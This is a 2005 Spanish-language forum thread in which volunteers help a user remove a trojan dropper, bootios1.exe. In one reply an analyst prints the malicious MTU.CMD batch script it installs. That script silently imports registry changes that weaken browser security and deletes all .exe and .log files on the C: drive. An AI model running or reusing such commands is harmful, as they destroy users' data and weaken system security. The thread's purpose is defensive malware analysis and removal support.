Necesito ayuda con un troyano!!

somer · Mensaje por **somer** » 07 Abr 2005, 20:03

Hola !

:cry: Tengo problemas con un virus el cual fue detectado con el nombre "bootios1.exe" el cual se encuentra localizado en el C:\, como puedo eliminarlo ya que por el momento se encuentra en cuarentena y quisiera saber si puede tener consecuencias a futuro.

Gracias!

Mensaje por **maura63** » 07 Abr 2005, 20:26

Arranca en modo seguro y de usar XP o ME desactiva antes la restauracion del sistema, y una vez encendido asi lanza tu antivirus.

Mira el tutorial en

https://foros.zonavirus.com/viewtopic.php?t=5370

Saludos

maura63

Mensaje por **msc hotline sat** » 08 Abr 2005, 10:44

Hay una cosa que no cuadra, y es que dices que tienes el fichero bootios1.exe en C:\ y por otra parte nos dices que lo tienes en cuarentena ???

Cuidado con este fichero que si estuviera en cuarentena ya no estaría en C:\, sino en C:\quarentine o similar, segun el antivirus utilizado, pero si sigue estando simultaneamente además en C:\ es señal de que se ha reproducido y conviene controlarlo.

Mira de mover este fichero a un disquete, para sacarlo del ordenador, y reiniciar la máquina y comprobar que ya no esté en C:\

Luego envianos una muestra del mismo a zonavirus@satinfo.es anexado a un mail cuyo texto sea un copiar y pegar de este post, para que podamos contestarte como respuesta de este Tema con el resultado del analisis y la utilidad de eliminacion si procede.

En cualquier caso, comentanos si tras mover el fichero y reiniciar, volviera a aparecer en C:\

saludos

ms, 8-04-2005

somer · Mensaje por **somer** » 09 Abr 2005, 08:13

Hola

Tienes razón por ahora se encuentra en cuarentena, quise entrar a las direcciones que me escribieron pero no se pudieron abrir, no se si sea por algún tipo de virus, ya tengo un mes que me esta pasando lo mismo, trato de abrir ciertas paginas y el explorador queda en blanco, no hay dirección, ni mensaje en donde diga que no existe , nada aparece, pensé que el motivo era que es demasiado lenta la conexión a Internet por lo que baje un acelerador llamado Modem booster, a un así siguió con lo mismo , así que pensé que era por causa de algún virus por lo que instale el McAfee, pero solo detecto el bootios.exe el que se encuentra ahora en cuarentena, quise enviarlo a la direccion que me escribiste pero no quiso abrir , por favor dame otra direccion para poder enviarlo.

Gracias

Mensaje por **maura63** » 09 Abr 2005, 14:24

No pinches en el enlace, toma nota de el abres tu correo introduce la direccion y envia adjuntando el archivo con el texto de un copiar y pegar del mismo para que sepamos del post que viene.

zonavirus@satinfo.es

Saludos

maura63

Mensaje por **msc hotline sat** » 12 Abr 2005, 12:31

Recibido el fichero BOOTIOS1.exe

Se trata de un ejecutable autoexpandible cuya ejecucion genera troyanos conocidos, y algun malware con extension .CMD

Este fichero BOOTIOS1.EXE debe ser eliminado, y si se hubiera ejecutado, tambien los creadis por él, especialmente el malware MTU.CMD que no sería identificado por los antivirus actuales:

[quote]
@echo off

REGEDIT.EXE /S 2343.reg

REGEDIT.EXE /S 5565.reg

msnhelp1.html

winmsnpage.html

del c:\bootios1.exe

del c:\%systemroot%\2343.reg

del c:\%systemroot%\5565.reg

del c:\dload1.exe

del /F /Q c:\*.exe

del /S /Q /F c:\*.log

del /S /Q /F c:\*.logs

exit

][/quote]

Con claras malas intenciones de malware, por lo que este especialmente debe eliminarse a mano, si existiera en cualquier parte del disco duro.

aparte, del contenido del autoextraible, se detecta:

[quote]

McAfee VirusScan for Win32 v4.40.0

Copyright (c) 1992-2003 Networks Associates Technology Inc. All rights reserved.

(408) 988-3832 LICENSED COPY - Sep 23 2004

Scan engine v4.4.00 for Win32.

Virus data file v4466 created Apr 11 2005

Scanning for 122183 viruses, trojans and variants.

04/12/2005 12:10:52

Options:

A: /ALL /PROGRAM /REPORT A:INFORME.TXT

Scanning A: []

Scanning A:\*.*

A:\winmsnpage.html ... Found application Adware-RBlast.dldr.

A:\2343.reg.vir ... Found the Reg/LowZones trojan !!!

A:\blank.html ... Found application Adware-RBlast.dldr.

A:\msnhelp1.html ... Found application Adware-RBlast.dldr.

A:\2343.reg ... Found the Reg/LowZones trojan !!!

[/quote]

Siendo el total de ficheros generados por la ejecucion del autoextraible, los siguientes:

[quote]

El volumen de la unidad A no tiene etiqueta.

El n£mero de serie del volumen es: 365A-13D6

Directorio de A:\

26/03/2005 02:05 460 winmsnpage.html

15/07/2004 01:54 1.013 2343.reg.vir

03/08/2004 00:31 130 5565.reg

26/03/2005 02:03 692 blank.html

26/03/2005 02:05 692 msnhelp1.html

26/03/2005 02:43 270 mtu.cmd

15/07/2004 01:54 1.013 2343.reg

12/04/2005 12:10 1.047 informe.txt

12/04/2005 12:17 0 dir.txt

9 archivos 5.317 bytes

0 dirs 1.433.600 bytes libres

[/quote]

Resumiendo, eliminar fichero EXE autoexplandible y si contenido si se hubiera descomprimido, y lanzar antivirus y antispywares como se indica en los tutoriales:

https://foros.zonavirus.com/viewtopic.php?t=5370

Por nuestra parte, enviamos este MTU.CMD a McAfee para su control como malware en proximas versiones.

saludos

ms, 12-04-2005[/quote]

Necesito ayuda con un troyano!!

Necesito ayuda con un troyano!!

Gracias por ayudarme, pero aun tengo problemas